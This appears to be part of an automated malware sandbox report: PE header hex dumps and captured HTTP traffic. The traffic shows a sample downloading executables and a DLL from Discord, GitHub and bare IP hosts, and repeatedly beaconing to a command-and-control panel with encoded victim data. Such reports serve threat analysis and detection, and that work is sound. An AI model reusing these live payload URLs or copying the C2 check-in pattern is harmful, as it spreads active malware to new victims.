00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:14 GMTContent-Type: application/octet-streamContent-Length: 886272Last-Modified: Sun, 09 Feb 2025 18:32:00 GMTConnection: keep-aliveETag: "67a8f4a0-d8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 f5 d0 36 46 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 60 05 00 00 82 0d 00 00 04 00 00 c0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 0e 00 00 04 00 00 f1 40 0d 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 b8 14 00 00 00 90 0d 00 b0 65 00 00 00 c0 0c 00 10 20 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 ab 0c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 54 0d 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 5e 05 00 00 10 00 00 00 60 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 50 01 00 00 00 70 05 00 00 02 00 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 20 30 07 00 00 80 05 00 00 32 07 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 10 20 00 00 00 c0 0c 00 00 22 00 00 00 98 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 a0 44 00 00 00 f0 0c 00 00 46 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 02 00 00 00 40 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 b8 14 00 00 00 50 0d 00 00 16 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 70 0d 00 00 02 00 00 00 16 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 80 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 65 00 00 00 90 0d 00 00 66 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 05 00 00 00 00 0e 00 00 06 00 00 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:34 GMTContent-Type: application/octet-streamContent-Length: 414016Last-Modified: Mon, 10 Feb 2025 12:25:59 GMTConnection: keep-aliveETag: "67a9f057-65140"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 0c 06 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 01 00 00 10 05 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: GET /attachments/1336331746618376235/1337207374028738580/Sarcastic_Setup.exe?ex=67a69aea&is=67a5496a&hm=3b32825118cc0d524c597462379541f592a0aaa009acbf73f5e08d6fb678b84e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074057001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/5957639473/kUHbhqh.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074058001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: GET /files/6875802221/Ryu8yUx.exe HTTP/1.1Host: 185.215.113.97
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074059001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
